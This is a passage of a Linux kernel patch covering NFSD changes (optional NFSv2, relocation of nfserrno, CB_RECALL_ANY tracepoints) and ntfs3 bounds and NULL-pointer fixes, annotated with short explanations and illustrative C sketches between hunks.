++	[OP_LAYOUTSTATS]	= nfsd4_encode_noop,
++	[OP_OFFLOAD_CANCEL]	= nfsd4_encode_noop,
++	[OP_OFFLOAD_STATUS]	= nfsd4_encode_offload_status,
++	[OP_READ_PLUS]		= nfsd4_encode_read_plus,
++	[OP_SEEK]		= nfsd4_encode_seek,
++	[OP_WRITE_SAME]		= nfsd4_encode_noop,
++	[OP_CLONE]		= nfsd4_encode_noop,
+ 
+ 	/* RFC 8276 extended attributes operations */
+-	[OP_GETXATTR]		= (nfsd4_enc)nfsd4_encode_getxattr,
+-	[OP_SETXATTR]		= (nfsd4_enc)nfsd4_encode_setxattr,
+-	[OP_LISTXATTRS]		= (nfsd4_enc)nfsd4_encode_listxattrs,
+-	[OP_REMOVEXATTR]	= (nfsd4_enc)nfsd4_encode_removexattr,
++	[OP_GETXATTR]		= nfsd4_encode_getxattr,
++	[OP_SETXATTR]		= nfsd4_encode_setxattr,
++	[OP_LISTXATTRS]		= nfsd4_encode_listxattrs,
++	[OP_REMOVEXATTR]	= nfsd4_encode_removexattr,
+ };
+ 
+ /*
+diff --git a/fs/nfsd/nfsctl.c b/fs/nfsd/nfsctl.c
+index 573de0d49e172..76a60e7a75097 100644
+--- a/fs/nfsd/nfsctl.c
++++ b/fs/nfsd/nfsctl.c
+@@ -581,7 +581,9 @@ static ssize_t __write_versions(struct file *file, char *buf, size_t size)
+ 
+ 			cmd = sign == '-' ? NFSD_CLEAR : NFSD_SET;
+ 			switch(num) {
++#ifdef CONFIG_NFSD_V2
+ 			case 2:
++#endif
+ 			case 3:
+ 				nfsd_vers(nn, num, cmd);
+ 				break;
+@@ -601,7 +603,9 @@ static ssize_t __write_versions(struct file *file, char *buf, size_t size)
+ 				}
+ 				break;
+ 			default:
+-				return -EINVAL;
++				/* Ignore requests to disable non-existent versions */
++				if (cmd == NFSD_SET)
++					return -EINVAL;
+ 			}
+ 			vers += len + 1;
+ 		} while ((len = qword_get(&mesg, vers, size)) > 0);
+@@ -1448,9 +1452,7 @@ static __net_init int nfsd_init_net(struct net *net)
+ 		goto out_idmap_error;
+ 	nn->nfsd_versions = NULL;
+ 	nn->nfsd4_minorversions = NULL;
+-	retval = nfsd4_init_leases_net(nn);
+-	if (retval)
+-		goto out_drc_error;
++	nfsd4_init_leases_net(nn);
+ 	retval = nfsd_reply_cache_init(nn);
+ 	if (retval)
+ 		goto out_cache_error;
+@@ -1460,8 +1462,6 @@ static __net_init int nfsd_init_net(struct net *net)
+ 	return 0;
+ 
+ out_cache_error:
+-	nfsd4_leases_net_shutdown(nn);
+-out_drc_error:
+ 	nfsd_idmap_shutdown(net);
+ out_idmap_error:
+ 	nfsd_export_shutdown(net);
+@@ -1477,7 +1477,6 @@ static __net_exit void nfsd_exit_net(struct net *net)
+ 	nfsd_idmap_shutdown(net);
+ 	nfsd_export_shutdown(net);
+ 	nfsd_netns_free_versions(net_generic(net, nfsd_net_id));
+-	nfsd4_leases_net_shutdown(nn);
+ }
+ 
+ static struct pernet_operations nfsd_net_ops = {
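In the nfsctl.c hunk, __write_versions now treats "-N" for an unknown or unbuilt version as a harmless no-op while still rejecting "+N", and nfsd4_init_leases_net becomes infallible, which removes one error-unwinding branch from nfsd_init_net. A small sketch of the version-toggle policy (illustrative helper, not the kernel function):

#include <stdbool.h>
#include <stdio.h>

#define NR_VERS 5
static bool supported[NR_VERS] = { [3] = true, [4] = true };
static bool enabled[NR_VERS]   = { [3] = true, [4] = true };

/*
 * Enabling an unknown version is an error; a request to *disable*
 * one is harmless and is simply ignored.
 */
static int set_version(unsigned int vers, bool enable)
{
	if (vers >= NR_VERS || !supported[vers])
		return enable ? -1 : 0;	/* error only for "+vers" */
	enabled[vers] = enable;
	return 0;
}

int main(void)
{
	printf("-2 -> %d\n", set_version(2, false));	/* ignored:  0 */
	printf("+2 -> %d\n", set_version(2, true));	/* rejected: -1 */
	printf("+4 -> %d\n", set_version(4, true));	/* ok:       0 */
	return 0;
}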
+diff --git a/fs/nfsd/nfsd.h b/fs/nfsd/nfsd.h
+index 09726c5b9a317..fa0144a742678 100644
+--- a/fs/nfsd/nfsd.h
++++ b/fs/nfsd/nfsd.h
+@@ -64,8 +64,7 @@ struct readdir_cd {
+ 
+ 
+ extern struct svc_program	nfsd_program;
+-extern const struct svc_version	nfsd_version2, nfsd_version3,
+-				nfsd_version4;
++extern const struct svc_version	nfsd_version2, nfsd_version3, nfsd_version4;
+ extern struct mutex		nfsd_mutex;
+ extern spinlock_t		nfsd_drc_lock;
+ extern unsigned long		nfsd_drc_max_mem;
+@@ -505,8 +504,7 @@ extern void unregister_cld_notifier(void);
+ extern void nfsd4_ssc_init_umount_work(struct nfsd_net *nn);
+ #endif
+ 
+-extern int nfsd4_init_leases_net(struct nfsd_net *nn);
+-extern void nfsd4_leases_net_shutdown(struct nfsd_net *nn);
++extern void nfsd4_init_leases_net(struct nfsd_net *nn);
+ 
+ #else /* CONFIG_NFSD_V4 */
+ static inline int nfsd4_is_junction(struct dentry *dentry)
+@@ -514,8 +512,7 @@ static inline int nfsd4_is_junction(struct dentry *dentry)
+ 	return 0;
+ }
+ 
+-static inline int nfsd4_init_leases_net(struct nfsd_net *nn) { return 0; };
+-static inline void nfsd4_leases_net_shutdown(struct nfsd_net *nn) {};
++static inline void nfsd4_init_leases_net(struct nfsd_net *nn) { };
+ 
+ #define register_cld_notifier() 0
+ #define unregister_cld_notifier() do { } while(0)
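The nfsd.h hunk relies on the usual config-stub idiom: a real declaration under CONFIG_NFSD_V4 and a static inline no-op otherwise, so callers compile unchanged either way; with nfsd4_init_leases_net now returning void, the !CONFIG_NFSD_V4 stub shrinks to an empty body. The idiom in miniature, with an invented feature name:

struct net_ctx { int leases; };

#ifdef CONFIG_FEATURE_X
void feature_x_init(struct net_ctx *ctx);	/* real version, defined elsewhere */
#else
/* Stub compiles away entirely; callers need no #ifdef of their own. */
static inline void feature_x_init(struct net_ctx *ctx) { }
#endif

int main(void)
{
	struct net_ctx ctx = { 0 };
	feature_x_init(&ctx);
	return ctx.leases;
}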
+diff --git a/fs/nfsd/nfsfh.h b/fs/nfsd/nfsfh.h
+index c3ae6414fc5cf..513e028b0bbee 100644
+--- a/fs/nfsd/nfsfh.h
++++ b/fs/nfsd/nfsfh.h
+@@ -220,7 +220,7 @@ __be32	fh_update(struct svc_fh *);
+ void	fh_put(struct svc_fh *);
+ 
+ static __inline__ struct svc_fh *
+-fh_copy(struct svc_fh *dst, struct svc_fh *src)
++fh_copy(struct svc_fh *dst, const struct svc_fh *src)
+ {
+ 	WARN_ON(src->fh_dentry);
+ 
+@@ -229,7 +229,7 @@ fh_copy(struct svc_fh *dst, struct svc_fh *src)
+ }
+ 
+ static inline void
+-fh_copy_shallow(struct knfsd_fh *dst, struct knfsd_fh *src)
++fh_copy_shallow(struct knfsd_fh *dst, const struct knfsd_fh *src)
+ {
+ 	dst->fh_size = src->fh_size;
+ 	memcpy(&dst->fh_raw, &src->fh_raw, src->fh_size);
+@@ -243,7 +243,8 @@ fh_init(struct svc_fh *fhp, int maxsize)
+ 	return fhp;
+ }
+ 
+-static inline bool fh_match(struct knfsd_fh *fh1, struct knfsd_fh *fh2)
++static inline bool fh_match(const struct knfsd_fh *fh1,
++			    const struct knfsd_fh *fh2)
+ {
+ 	if (fh1->fh_size != fh2->fh_size)
+ 		return false;
+@@ -252,7 +253,8 @@ static inline bool fh_match(struct knfsd_fh *fh1, struct knfsd_fh *fh2)
+ 	return true;
+ }
+ 
+-static inline bool fh_fsid_match(struct knfsd_fh *fh1, struct knfsd_fh *fh2)
++static inline bool fh_fsid_match(const struct knfsd_fh *fh1,
++				 const struct knfsd_fh *fh2)
+ {
+ 	if (fh1->fh_fsid_type != fh2->fh_fsid_type)
+ 		return false;
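The nfsfh.h changes are pure const-correctness: fh_copy, fh_copy_shallow, fh_match and fh_fsid_match never modify their source operands, so qualifying those parameters const documents the contract, lets the compiler reject accidental writes, and allows const-qualified handles to be passed without casts. A self-contained sketch of the same style of helper (invented types):

#include <stdbool.h>
#include <string.h>

struct fh { unsigned int size; unsigned char raw[64]; };

/* Both operands are read-only, so both sides are const-qualified. */
static bool fh_equal(const struct fh *a, const struct fh *b)
{
	return a->size == b->size && memcmp(a->raw, b->raw, a->size) == 0;
}

int main(void)
{
	const struct fh a = { .size = 4, .raw = "abcd" }, b = a;
	return fh_equal(&a, &b) ? 0 : 1;
}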
+diff --git a/fs/nfsd/nfsproc.c b/fs/nfsd/nfsproc.c
+index 82b3ddeacc338..9744443c39652 100644
+--- a/fs/nfsd/nfsproc.c
++++ b/fs/nfsd/nfsproc.c
+@@ -211,7 +211,7 @@ nfsd_proc_read(struct svc_rqst *rqstp)
+ 	if (resp->status == nfs_ok)
+ 		resp->status = fh_getattr(&resp->fh, &resp->stat);
+ 	else if (resp->status == nfserr_jukebox)
+-		return rpc_drop_reply;
++		set_bit(RQ_DROPME, &rqstp->rq_flags);
+ 	return rpc_success;
+ }
+ 
+@@ -246,7 +246,7 @@ nfsd_proc_write(struct svc_rqst *rqstp)
+ 	if (resp->status == nfs_ok)
+ 		resp->status = fh_getattr(&resp->fh, &resp->stat);
+ 	else if (resp->status == nfserr_jukebox)
+-		return rpc_drop_reply;
++		set_bit(RQ_DROPME, &rqstp->rq_flags);
+ 	return rpc_success;
+ }
+ 
+@@ -848,65 +848,3 @@ const struct svc_version nfsd_version2 = {
+ 	.vs_dispatch	= nfsd_dispatch,
+ 	.vs_xdrsize	= NFS2_SVC_XDRSIZE,
+ };
+-
+-/*
+- * Map errnos to NFS errnos.
+- */
+-__be32
+-nfserrno (int errno)
+-{
+-	static struct {
+-		__be32	nfserr;
+-		int	syserr;
+-	} nfs_errtbl[] = {
+-		{ nfs_ok, 0 },
+-		{ nfserr_perm, -EPERM },
+-		{ nfserr_noent, -ENOENT },
+-		{ nfserr_io, -EIO },
+-		{ nfserr_nxio, -ENXIO },
+-		{ nfserr_fbig, -E2BIG },
+-		{ nfserr_stale, -EBADF },
+-		{ nfserr_acces, -EACCES },
+-		{ nfserr_exist, -EEXIST },
+-		{ nfserr_xdev, -EXDEV },
+-		{ nfserr_mlink, -EMLINK },
+-		{ nfserr_nodev, -ENODEV },
+-		{ nfserr_notdir, -ENOTDIR },
+-		{ nfserr_isdir, -EISDIR },
+-		{ nfserr_inval, -EINVAL },
+-		{ nfserr_fbig, -EFBIG },
+-		{ nfserr_nospc, -ENOSPC },
+-		{ nfserr_rofs, -EROFS },
+-		{ nfserr_mlink, -EMLINK },
+-		{ nfserr_nametoolong, -ENAMETOOLONG },
+-		{ nfserr_notempty, -ENOTEMPTY },
+-#ifdef EDQUOT
+-		{ nfserr_dquot, -EDQUOT },
+-#endif
+-		{ nfserr_stale, -ESTALE },
+-		{ nfserr_jukebox, -ETIMEDOUT },
+-		{ nfserr_jukebox, -ERESTARTSYS },
+-		{ nfserr_jukebox, -EAGAIN },
+-		{ nfserr_jukebox, -EWOULDBLOCK },
+-		{ nfserr_jukebox, -ENOMEM },
+-		{ nfserr_io, -ETXTBSY },
+-		{ nfserr_notsupp, -EOPNOTSUPP },
+-		{ nfserr_toosmall, -ETOOSMALL },
+-		{ nfserr_serverfault, -ESERVERFAULT },
+-		{ nfserr_serverfault, -ENFILE },
+-		{ nfserr_io, -EREMOTEIO },
+-		{ nfserr_stale, -EOPENSTALE },
+-		{ nfserr_io, -EUCLEAN },
+-		{ nfserr_perm, -ENOKEY },
+-		{ nfserr_no_grace, -ENOGRACE},
+-	};
+-	int	i;
+-
+-	for (i = 0; i < ARRAY_SIZE(nfs_errtbl); i++) {
+-		if (nfs_errtbl[i].syserr == errno)
+-			return nfs_errtbl[i].nfserr;
+-	}
+-	WARN_ONCE(1, "nfsd: non-standard errno: %d\n", errno);
+-	return nfserr_io;
+-}
+-
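Two things happen in the nfsproc.c hunk: the v2 READ/WRITE handlers signal a dropped reply by setting RQ_DROPME on the request instead of returning the rpc_drop_reply sentinel, and the local errno-to-NFS-status table is deleted from this file. A sketch of flag-based drop signaling (invented types; the kernel uses set_bit()/test_bit() on rqstp->rq_flags):

#include <stdio.h>

#define RQ_FLAG_DROPME (1u << 0)

struct request { unsigned int flags; int status; };

/*
 * Instead of a magic sentinel return value, the handler sets a flag
 * on the request and always returns success; the dispatcher tests
 * the flag afterwards.
 */
static int handle(struct request *rq, int busy)
{
	if (busy) {
		rq->flags |= RQ_FLAG_DROPME;	/* "drop this reply" */
		return 0;			/* no special return code */
	}
	rq->status = 42;
	return 0;
}

int main(void)
{
	struct request rq = { 0 };
	handle(&rq, 1);
	if (rq.flags & RQ_FLAG_DROPME)
		printf("reply dropped\n");
	return 0;
}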
+diff --git a/fs/nfsd/nfssvc.c b/fs/nfsd/nfssvc.c
+index c7695ebd28dc3..0c75636054a54 100644
+--- a/fs/nfsd/nfssvc.c
++++ b/fs/nfsd/nfssvc.c
+@@ -91,8 +91,12 @@ unsigned long	nfsd_drc_mem_used;
+ #if defined(CONFIG_NFSD_V2_ACL) || defined(CONFIG_NFSD_V3_ACL)
+ static struct svc_stat	nfsd_acl_svcstats;
+ static const struct svc_version *nfsd_acl_version[] = {
++# if defined(CONFIG_NFSD_V2_ACL)
+ 	[2] = &nfsd_acl_version2,
++# endif
++# if defined(CONFIG_NFSD_V3_ACL)
+ 	[3] = &nfsd_acl_version3,
++# endif
+ };
+ 
+ #define NFSD_ACL_MINVERS            2
+@@ -116,7 +120,9 @@ static struct svc_stat	nfsd_acl_svcstats = {
+ #endif /* defined(CONFIG_NFSD_V2_ACL) || defined(CONFIG_NFSD_V3_ACL) */
+ 
+ static const struct svc_version *nfsd_version[] = {
++#if defined(CONFIG_NFSD_V2)
+ 	[2] = &nfsd_version2,
++#endif
+ 	[3] = &nfsd_version3,
+ #if defined(CONFIG_NFSD_V4)
+ 	[4] = &nfsd_version4,
+@@ -1065,7 +1071,7 @@ int nfsd_dispatch(struct svc_rqst *rqstp, __be32 *statp)
+ 
+ 	nfs_reply = xdr_inline_decode(&rqstp->rq_res_stream, 0);
+ 	*statp = proc->pc_func(rqstp);
+-	if (*statp == rpc_drop_reply || test_bit(RQ_DROPME, &rqstp->rq_flags))
++	if (test_bit(RQ_DROPME, &rqstp->rq_flags))
+ 		goto out_update_drop;
+ 
+ 	if (!proc->pc_encode(rqstp, &rqstp->rq_res_stream))
+diff --git a/fs/nfsd/state.h b/fs/nfsd/state.h
+index e2daef3cc0034..e94634d305912 100644
+--- a/fs/nfsd/state.h
++++ b/fs/nfsd/state.h
+@@ -368,6 +368,7 @@ struct nfs4_client {
+ #define NFSD4_CLIENT_UPCALL_LOCK	(5)	/* upcall serialization */
+ #define NFSD4_CLIENT_CB_FLAG_MASK	(1 << NFSD4_CLIENT_CB_UPDATE | \
+ 					 1 << NFSD4_CLIENT_CB_KILL)
++#define NFSD4_CLIENT_CB_RECALL_ANY	(6)
+ 	unsigned long		cl_flags;
+ 	const struct cred	*cl_cb_cred;
+ 	struct rpc_clnt		*cl_cb_client;
+@@ -411,6 +412,10 @@ struct nfs4_client {
+ 
+ 	unsigned int		cl_state;
+ 	atomic_t		cl_delegs_in_recall;
++
++	struct nfsd4_cb_recall_any	*cl_ra;
++	time64_t		cl_ra_time;
++	struct list_head	cl_ra_cblist;
+ };
+ 
+ /* struct nfs4_client_reset
+@@ -536,16 +541,13 @@ struct nfs4_clnt_odstate {
+  * inode can have multiple filehandles associated with it, so there is
+  * (potentially) a many to one relationship between this struct and struct
+  * inode.
+- *
+- * These are hashed by filehandle in the file_hashtbl, which is protected by
+- * the global state_lock spinlock.
+  */
+ struct nfs4_file {
+ 	refcount_t		fi_ref;
+ 	struct inode *		fi_inode;
+ 	bool			fi_aliased;
+ 	spinlock_t		fi_lock;
+-	struct hlist_node       fi_hash;	/* hash on fi_fhandle */
++	struct rhlist_head	fi_rlist;
+ 	struct list_head        fi_stateids;
+ 	union {
+ 		struct list_head	fi_delegations;
+@@ -639,6 +641,7 @@ enum nfsd4_cb_op {
+ 	NFSPROC4_CLNT_CB_OFFLOAD,
+ 	NFSPROC4_CLNT_CB_SEQUENCE,
+ 	NFSPROC4_CLNT_CB_NOTIFY_LOCK,
++	NFSPROC4_CLNT_CB_RECALL_ANY,
+ };
+ 
+ /* Returns true iff a is later than b: */
+diff --git a/fs/nfsd/trace.h b/fs/nfsd/trace.h
+index 132335011ccae..4183819ea0829 100644
+--- a/fs/nfsd/trace.h
++++ b/fs/nfsd/trace.h
+@@ -9,9 +9,12 @@
+ #define _NFSD_TRACE_H
+ 
+ #include <linux/tracepoint.h>
++#include <linux/sunrpc/xprt.h>
++#include <trace/misc/nfs.h>
+ 
+ #include "export.h"
+ #include "nfsfh.h"
++#include "xdr4.h"
+ 
+ #define NFSD_TRACE_PROC_RES_FIELDS \
+ 		__field(unsigned int, netns_ino) \
+@@ -604,6 +607,7 @@ DEFINE_STATEID_EVENT(layout_recall_release);
+ 
+ DEFINE_STATEID_EVENT(open);
+ DEFINE_STATEID_EVENT(deleg_read);
++DEFINE_STATEID_EVENT(deleg_return);
+ DEFINE_STATEID_EVENT(deleg_recall);
+ 
+ DECLARE_EVENT_CLASS(nfsd_stateseqid_class,
+@@ -636,6 +640,61 @@ DEFINE_EVENT(nfsd_stateseqid_class, nfsd_##name, \
+ DEFINE_STATESEQID_EVENT(preprocess);
+ DEFINE_STATESEQID_EVENT(open_confirm);
+ 
++TRACE_DEFINE_ENUM(NFS4_OPEN_STID);
++TRACE_DEFINE_ENUM(NFS4_LOCK_STID);
++TRACE_DEFINE_ENUM(NFS4_DELEG_STID);
++TRACE_DEFINE_ENUM(NFS4_CLOSED_STID);
++TRACE_DEFINE_ENUM(NFS4_REVOKED_DELEG_STID);
++TRACE_DEFINE_ENUM(NFS4_CLOSED_DELEG_STID);
++TRACE_DEFINE_ENUM(NFS4_LAYOUT_STID);
++
++#define show_stid_type(x)						\
++	__print_flags(x, "|",						\
++		{ NFS4_OPEN_STID,		"OPEN" },		\
++		{ NFS4_LOCK_STID,		"LOCK" },		\
++		{ NFS4_DELEG_STID,		"DELEG" },		\
++		{ NFS4_CLOSED_STID,		"CLOSED" },		\
++		{ NFS4_REVOKED_DELEG_STID,	"REVOKED" },		\
++		{ NFS4_CLOSED_DELEG_STID,	"CLOSED_DELEG" },	\
++		{ NFS4_LAYOUT_STID,		"LAYOUT" })
++
++DECLARE_EVENT_CLASS(nfsd_stid_class,
++	TP_PROTO(
++		const struct nfs4_stid *stid
++	),
++	TP_ARGS(stid),
++	TP_STRUCT__entry(
++		__field(unsigned long, sc_type)
++		__field(int, sc_count)
++		__field(u32, cl_boot)
++		__field(u32, cl_id)
++		__field(u32, si_id)
++		__field(u32, si_generation)
++	),
++	TP_fast_assign(
++		const stateid_t *stp = &stid->sc_stateid;
++
++		__entry->sc_type = stid->sc_type;
++		__entry->sc_count = refcount_read(&stid->sc_count);
++		__entry->cl_boot = stp->si_opaque.so_clid.cl_boot;
++		__entry->cl_id = stp->si_opaque.so_clid.cl_id;
++		__entry->si_id = stp->si_opaque.so_id;
++		__entry->si_generation = stp->si_generation;
++	),
++	TP_printk("client %08x:%08x stateid %08x:%08x ref=%d type=%s",
++		__entry->cl_boot, __entry->cl_id,
++		__entry->si_id, __entry->si_generation,
++		__entry->sc_count, show_stid_type(__entry->sc_type)
++	)
++);
++
++#define DEFINE_STID_EVENT(name)					\
++DEFINE_EVENT(nfsd_stid_class, nfsd_stid_##name,			\
++	TP_PROTO(const struct nfs4_stid *stid),			\
++	TP_ARGS(stid))
++
++DEFINE_STID_EVENT(revoke);
++
+ DECLARE_EVENT_CLASS(nfsd_clientid_class,
+ 	TP_PROTO(const clientid_t *clid),
+ 	TP_ARGS(clid),
+@@ -1436,6 +1495,32 @@ TRACE_EVENT(nfsd_cb_offload,
+ 		__entry->fh_hash, __entry->count, __entry->status)
+ );
+ 
++TRACE_EVENT(nfsd_cb_recall_any,
++	TP_PROTO(
++		const struct nfsd4_cb_recall_any *ra
++	),
++	TP_ARGS(ra),
++	TP_STRUCT__entry(
++		__field(u32, cl_boot)
++		__field(u32, cl_id)
++		__field(u32, keep)
++		__field(unsigned long, bmval0)
++		__sockaddr(addr, ra->ra_cb.cb_clp->cl_cb_conn.cb_addrlen)
++	),
++	TP_fast_assign(
++		__entry->cl_boot = ra->ra_cb.cb_clp->cl_clientid.cl_boot;
++		__entry->cl_id = ra->ra_cb.cb_clp->cl_clientid.cl_id;
++		__entry->keep = ra->ra_keep;
++		__entry->bmval0 = ra->ra_bmval[0];
++		__assign_sockaddr(addr, &ra->ra_cb.cb_clp->cl_addr,
++				  ra->ra_cb.cb_clp->cl_cb_conn.cb_addrlen);
++	),
++	TP_printk("addr=%pISpc client %08x:%08x keep=%u bmval0=%s",
++		__get_sockaddr(addr), __entry->cl_boot, __entry->cl_id,
++		__entry->keep, show_rca_mask(__entry->bmval0)
++	)
++);
++
+ DECLARE_EVENT_CLASS(nfsd_cb_done_class,
+ 	TP_PROTO(
+ 		const stateid_t *stp,
+@@ -1475,6 +1560,27 @@ DEFINE_NFSD_CB_DONE_EVENT(nfsd_cb_notify_lock_done);
+ DEFINE_NFSD_CB_DONE_EVENT(nfsd_cb_layout_done);
+ DEFINE_NFSD_CB_DONE_EVENT(nfsd_cb_offload_done);
+ 
++TRACE_EVENT(nfsd_cb_recall_any_done,
++	TP_PROTO(
++		const struct nfsd4_callback *cb,
++		const struct rpc_task *task
++	),
++	TP_ARGS(cb, task),
++	TP_STRUCT__entry(
++		__field(u32, cl_boot)
++		__field(u32, cl_id)
++		__field(int, status)
++	),
++	TP_fast_assign(
++		__entry->status = task->tk_status;
++		__entry->cl_boot = cb->cb_clp->cl_clientid.cl_boot;
++		__entry->cl_id = cb->cb_clp->cl_clientid.cl_id;
++	),
++	TP_printk("client %08x:%08x status=%d",
++		__entry->cl_boot, __entry->cl_id, __entry->status
++	)
++);
++
+ #endif /* _NFSD_TRACE_H */
+ 
+ #undef TRACE_INCLUDE_PATH
+diff --git a/fs/nfsd/vfs.c b/fs/nfsd/vfs.c
+index eccc6ce55a63a..5d6a61d47a905 100644
+--- a/fs/nfsd/vfs.c
++++ b/fs/nfsd/vfs.c
+@@ -49,6 +49,69 @@
+ 
+ #define NFSDDBG_FACILITY		NFSDDBG_FILEOP
+ 
++/**
++ * nfserrno - Map Linux errnos to NFS errnos
++ * @errno: POSIX(-ish) error code to be mapped
++ *
++ * Returns the appropriate (net-endian) nfserr_* (or nfs_ok if errno is 0). If
++ * it's an error we don't expect, log it once and return nfserr_io.
++ */
++__be32
++nfserrno (int errno)
++{
++	static struct {
++		__be32	nfserr;
++		int	syserr;
++	} nfs_errtbl[] = {
++		{ nfs_ok, 0 },
++		{ nfserr_perm, -EPERM },
++		{ nfserr_noent, -ENOENT },
++		{ nfserr_io, -EIO },
++		{ nfserr_nxio, -ENXIO },
++		{ nfserr_fbig, -E2BIG },
++		{ nfserr_stale, -EBADF },
++		{ nfserr_acces, -EACCES },
++		{ nfserr_exist, -EEXIST },
++		{ nfserr_xdev, -EXDEV },
++		{ nfserr_mlink, -EMLINK },
++		{ nfserr_nodev, -ENODEV },
++		{ nfserr_notdir, -ENOTDIR },
++		{ nfserr_isdir, -EISDIR },
++		{ nfserr_inval, -EINVAL },
++		{ nfserr_fbig, -EFBIG },
++		{ nfserr_nospc, -ENOSPC },
++		{ nfserr_rofs, -EROFS },
++		{ nfserr_mlink, -EMLINK },
++		{ nfserr_nametoolong, -ENAMETOOLONG },
++		{ nfserr_notempty, -ENOTEMPTY },
++		{ nfserr_dquot, -EDQUOT },
++		{ nfserr_stale, -ESTALE },
++		{ nfserr_jukebox, -ETIMEDOUT },
++		{ nfserr_jukebox, -ERESTARTSYS },
++		{ nfserr_jukebox, -EAGAIN },
++		{ nfserr_jukebox, -EWOULDBLOCK },
++		{ nfserr_jukebox, -ENOMEM },
++		{ nfserr_io, -ETXTBSY },
++		{ nfserr_notsupp, -EOPNOTSUPP },
++		{ nfserr_toosmall, -ETOOSMALL },
++		{ nfserr_serverfault, -ESERVERFAULT },
++		{ nfserr_serverfault, -ENFILE },
++		{ nfserr_io, -EREMOTEIO },
++		{ nfserr_stale, -EOPENSTALE },
++		{ nfserr_io, -EUCLEAN },
++		{ nfserr_perm, -ENOKEY },
++		{ nfserr_no_grace, -ENOGRACE},
++	};
++	int	i;
++
++	for (i = 0; i < ARRAY_SIZE(nfs_errtbl); i++) {
++		if (nfs_errtbl[i].syserr == errno)
++			return nfs_errtbl[i].nfserr;
++	}
++	WARN_ONCE(1, "nfsd: non-standard errno: %d\n", errno);
++	return nfserr_io;
++}
++
+ /* 
+  * Called from nfsd_lookup and encode_dirent. Check if we have crossed 
+  * a mount point.
+@@ -1317,7 +1380,6 @@ nfsd_create_locked(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 		iap->ia_mode &= ~current_umask();
+ 
+ 	err = 0;
+-	host_err = 0;
+ 	switch (type) {
+ 	case S_IFREG:
+ 		host_err = vfs_create(&init_user_ns, dirp, dchild, iap->ia_mode, true);
+diff --git a/fs/nfsd/vfs.h b/fs/nfsd/vfs.h
+index 9744b041105b5..dbdfef7ae85bb 100644
+--- a/fs/nfsd/vfs.h
++++ b/fs/nfsd/vfs.h
+@@ -60,6 +60,7 @@ static inline void nfsd_attrs_free(struct nfsd_attrs *attrs)
+ 	posix_acl_release(attrs->na_dpacl);
+ }
+ 
++__be32		nfserrno (int errno);
+ int		nfsd_cross_mnt(struct svc_rqst *rqstp, struct dentry **dpp,
+ 		                struct svc_export **expp);
+ __be32		nfsd_lookup(struct svc_rqst *, struct svc_fh *,
+diff --git a/fs/nfsd/xdr4.h b/fs/nfsd/xdr4.h
+index 36c3340c1d54a..510978e602da6 100644
+--- a/fs/nfsd/xdr4.h
++++ b/fs/nfsd/xdr4.h
+@@ -896,5 +896,10 @@ struct nfsd4_operation {
+ 			union nfsd4_op_u *);
+ };
+ 
++struct nfsd4_cb_recall_any {
++	struct nfsd4_callback	ra_cb;
++	u32			ra_keep;
++	u32			ra_bmval[1];
++};
+ 
+ #endif
+diff --git a/fs/nfsd/xdr4cb.h b/fs/nfsd/xdr4cb.h
+index 547cf07cf4e08..0d39af1b00a0f 100644
+--- a/fs/nfsd/xdr4cb.h
++++ b/fs/nfsd/xdr4cb.h
+@@ -48,3 +48,9 @@
+ #define NFS4_dec_cb_offload_sz		(cb_compound_dec_hdr_sz  +      \
+ 					cb_sequence_dec_sz +            \
+ 					op_dec_sz)
++#define NFS4_enc_cb_recall_any_sz	(cb_compound_enc_hdr_sz +       \
++					cb_sequence_enc_sz +            \
++					1 + 1 + 1)
++#define NFS4_dec_cb_recall_any_sz	(cb_compound_dec_hdr_sz  +      \
++					cb_sequence_dec_sz +            \
++					op_dec_sz)
+diff --git a/fs/ntfs3/frecord.c b/fs/ntfs3/frecord.c
+index bb7e33c240737..d260260900241 100644
+--- a/fs/ntfs3/frecord.c
++++ b/fs/ntfs3/frecord.c
+@@ -102,7 +102,7 @@ void ni_clear(struct ntfs_inode *ni)
+ {
+ 	struct rb_node *node;
+ 
+-	if (!ni->vfs_inode.i_nlink && is_rec_inuse(ni->mi.mrec))
++	if (!ni->vfs_inode.i_nlink && ni->mi.mrec && is_rec_inuse(ni->mi.mrec))
+ 		ni_delete_all(ni);
+ 
+ 	al_destroy(ni);
+@@ -3255,6 +3255,9 @@ int ni_write_inode(struct inode *inode, int sync, const char *hint)
+ 		return 0;
+ 	}
+ 
++	if (!ni->mi.mrec)
++		goto out;
++
+ 	if (is_rec_inuse(ni->mi.mrec) &&
+ 	    !(sbi->flags & NTFS_FLAGS_LOG_REPLAYING) && inode->i_nlink) {
+ 		bool modified = false;
+diff --git a/fs/ntfs3/fsntfs.c b/fs/ntfs3/fsntfs.c
+index 1eac80d55b554..4c2d079b3d49b 100644
+--- a/fs/ntfs3/fsntfs.c
++++ b/fs/ntfs3/fsntfs.c
+@@ -1674,6 +1674,7 @@ struct ntfs_inode *ntfs_new_inode(struct ntfs_sb_info *sbi, CLST rno, bool dir)
+ 
+ out:
+ 	if (err) {
++		make_bad_inode(inode);
+ 		iput(inode);
+ 		ni = ERR_PTR(err);
+ 	}
+diff --git a/fs/ntfs3/index.c b/fs/ntfs3/index.c
+index 7371f7855e4c4..eee01db6e0cc5 100644
+--- a/fs/ntfs3/index.c
++++ b/fs/ntfs3/index.c
+@@ -998,6 +998,7 @@ struct INDEX_ROOT *indx_get_root(struct ntfs_index *indx, struct ntfs_inode *ni,
+ 	struct ATTR_LIST_ENTRY *le = NULL;
+ 	struct ATTRIB *a;
+ 	const struct INDEX_NAMES *in = &s_index_names[indx->type];
++	struct INDEX_ROOT *root = NULL;
+ 
+ 	a = ni_find_attr(ni, NULL, &le, ATTR_ROOT, in->name, in->name_len, NULL,
+ 			 mi);
+@@ -1007,7 +1008,15 @@ struct INDEX_ROOT *indx_get_root(struct ntfs_index *indx, struct ntfs_inode *ni,
+ 	if (attr)
+ 		*attr = a;
+ 
+-	return resident_data_ex(a, sizeof(struct INDEX_ROOT));
++	root = resident_data_ex(a, sizeof(struct INDEX_ROOT));
++
++	/* length check */
++	if (root && offsetof(struct INDEX_ROOT, ihdr) + le32_to_cpu(root->ihdr.used) >
++			le32_to_cpu(a->res.data_size)) {
++		return NULL;
++	}
++
++	return root;
+ }
+ 
+ static int indx_write(struct ntfs_index *indx, struct ntfs_inode *ni,
+diff --git a/include/linux/bvec.h b/include/linux/bvec.h
+index 9e3dac51eb26b..d4dbaae8b5218 100644
+--- a/include/linux/bvec.h
++++ b/include/linux/bvec.h
+@@ -59,7 +59,7 @@ struct bvec_iter {
+ 
+ 	unsigned int            bi_bvec_done;	/* number of bytes completed in
+ 						   current bvec */
+-} __packed;
